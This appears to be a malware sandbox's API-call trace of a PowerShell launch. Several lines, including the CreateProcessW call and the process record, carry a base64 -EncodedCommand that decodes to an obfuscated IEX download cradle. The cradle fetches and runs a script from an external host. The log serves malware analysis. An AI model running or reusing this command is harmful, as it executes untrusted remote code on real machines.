	[0815.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.185] SetErrorMode (uMode=0x1) returned 0x1
	[0815.185] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.186] SetErrorMode (uMode=0x1) returned 0x1
	[0815.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.186] SetErrorMode (uMode=0x1) returned 0x1
	[0815.186] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.186] SetErrorMode (uMode=0x1) returned 0x1
	[0815.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.187] SetErrorMode (uMode=0x1) returned 0x1
	[0815.187] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.187] SetErrorMode (uMode=0x1) returned 0x1
	[0815.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.187] SetErrorMode (uMode=0x1) returned 0x1
	[0815.188] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.188] SetErrorMode (uMode=0x1) returned 0x1
	[0815.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.188] SetErrorMode (uMode=0x1) returned 0x1
	[0815.188] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.188] SetErrorMode (uMode=0x1) returned 0x1
	[0815.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.189] SetErrorMode (uMode=0x1) returned 0x1
	[0815.189] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.189] SetErrorMode (uMode=0x1) returned 0x1
	[0815.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.190] SetErrorMode (uMode=0x1) returned 0x1
	[0815.190] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.190] SetErrorMode (uMode=0x1) returned 0x1
	[0815.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.190] SetErrorMode (uMode=0x1) returned 0x1
	[0815.190] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.191] SetErrorMode (uMode=0x1) returned 0x1
	[0815.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.191] SetErrorMode (uMode=0x1) returned 0x1
	[0815.191] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.191] SetErrorMode (uMode=0x1) returned 0x1
	[0815.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.192] SetErrorMode (uMode=0x1) returned 0x1
	[0815.192] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b3d4ce0
	[0815.193] FindNextFileW (in: hFindFile=0x1b3d4ce0, lpFindFileData=0x1c68d8d0 | out: lpFindFileData=0x1c68d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0815.193] FindClose (in: hFindFile=0x1b3d4ce0 | out: hFindFile=0x1b3d4ce0) returned 1
	[0815.193] SetErrorMode (uMode=0x1) returned 0x1
	[0815.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c68d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0815.194] SetErrorMode (uMode=0x1) returned 0x1
	[0815.194] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c68dbf0 | out: lpFileInformation=0x1c68dbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0815.195] SetErrorMode (uMode=0x1) returned 0x1
	[0815.196] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0815.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.196] CoTaskMemFree (pv=0x33ab50) 
	[0816.492] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0816.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0816.493] CoTaskMemFree (pv=0x33ab50) 
	[0816.496] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0816.496] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0816.496] CoTaskMemFree (pv=0x33ab50) 
	[0816.506] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0816.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0816.506] CoTaskMemFree (pv=0x33ab50) 
	[0816.520] CoTaskMemAlloc (cb=0x3b) returned 0x3f1fd0
	[0816.520] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c68ddd8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c68ddd8) returned 0x4550
	[0816.521] CoTaskMemFree (pv=0x3f1fd0) 
	[0816.525] GetConsoleWindow () returned 0x103fc
	[0818.136] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0818.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.136] CoTaskMemFree (pv=0x33ab50) 
	[0819.456] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0819.456] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0819.456] CoTaskMemFree (pv=0x33ab50) 
	[0819.462] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0819.462] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0819.462] CoTaskMemFree (pv=0x33ab50) 
	[0819.464] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c68de20 | out: pNumArgs=0x1c68de20) returned 0x1b3f8e10*=""
	[0819.466] lstrlenW (lpString="-EncodedCommand") returned 15
	[0819.467] CoTaskMemAlloc (cb=0x22) returned 0x1b3ed0b0
	[0819.467] RtlMoveMemory (in: Destination=0x1b3ed0b0, Source=0x1b3f8e32, Length=0x20 | out: Destination=0x1b3ed0b0) 
	[0819.467] CoTaskMemFree (pv=0x1b3ed0b0) 
	[0819.467] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0819.467] CoTaskMemAlloc (cb=0x2f4) returned 0x36dfb0
	[0819.467] RtlMoveMemory (in: Destination=0x36dfb0, Source=0x1b3f8e52, Length=0x2f2 | out: Destination=0x36dfb0) 
	[0819.467] CoTaskMemFree (pv=0x36dfb0) 
	[0819.468] LocalFree (hMem=0x1b3f8e10) returned 0x0
	[0819.468] CoTaskMemAlloc (cb=0x804) returned 0x1b4198e0
	[0819.469] GetConsoleTitleW (in: lpConsoleTitle=0x1b4198e0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0819.469] CoTaskMemFree (pv=0x1b4198e0) 
	[0819.478] CoTaskMemAlloc (cb=0x38e) returned 0x1b3f8e10
	[0819.479] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c68dd80*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2da6c60 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2da6c60*(hProcess=0x338, hThread=0x34c, dwProcessId=0x1fb4, dwThreadId=0x22c0)) returned 1
	[0820.031] CoTaskMemFree (pv=0x1b3f8e10) 
	[0820.032] CloseHandle (hObject=0x34c) returned 1
	[0820.033] CoTaskMemAlloc (cb=0x3b) returned 0x3f1fd0
	[0820.033] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c68de28, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c68de28) returned 0x4550
	[0820.033] CoTaskMemFree (pv=0x3f1fd0) 
	[0820.036] GetCurrentProcess () returned 0xffffffffffffffff
	[0820.036] GetCurrentProcess () returned 0xffffffffffffffff
	[0820.037] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x338, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c68df08, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c68df08*=0x34c) returned 1

Process:
	id = "56"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x16e2e000"
	os_pid = "0xefc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 305
	os_tid = 0xf00

	[0484.574] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0487.047] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0487.048] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0487.048] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0487.048] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0494.496] GetVersionExW (in: lpVersionInformation=0xadb60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadb60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0494.499] GetVersionExW (in: lpVersionInformation=0xadb60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadb60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0494.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0494.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0494.512] GetVersionExW (in: lpVersionInformation=0xad8d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xad8d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0494.513] SetErrorMode (uMode=0x1) returned 0x1
	[0494.514] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xada30 | out: lpFileInformation=0xada30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0494.515] SetErrorMode (uMode=0x1) returned 0x1
	[0494.518] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xadca0 | out: lpdwHandle=0xadca0) returned 0x94c
	[0494.520] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bf72d8 | out: lpData=0x2bf72d8) returned 1
	[0494.522] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xadc18, puLen=0xadc10 | out: lplpBuffer=0xadc18*=0x2bf7374, puLen=0xadc10) returned 1
	[0495.335] lstrlenW (lpString="䅁") returned 1
	[0495.344] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x2bf7450, puLen=0xadb80) returned 1
	[0495.344] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0495.347] CoTaskMemAlloc (cb=0x2e) returned 0x201d40
	[0495.347] lstrcpyW (in: lpString1=0x201d40, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0495.348] CoTaskMemFree (pv=0x201d40) 
	[0495.348] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x2bf74a4, puLen=0xadb80) returned 1
	[0495.348] lstrlenW (lpString="System.Management.Automation") returned 28
	[0495.348] CoTaskMemAlloc (cb=0x3c) returned 0x139860
	[0495.348] lstrcpyW (in: lpString1=0x139860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0495.348] CoTaskMemFree (pv=0x139860) 
	[0495.348] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x2bf7500, puLen=0xadb80) returned 1
	[0495.348] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0495.348] CoTaskMemAlloc (cb=0x20) returned 0x202280
	[0495.348] lstrcpyW (in: lpString1=0x202280, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0495.348] CoTaskMemFree (pv=0x202280) 
	[0495.348] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x2bf7540, puLen=0xadb80) returned 1
	[0495.348] lstrlenW (lpString="System.Management.Automation.dll") returned 32
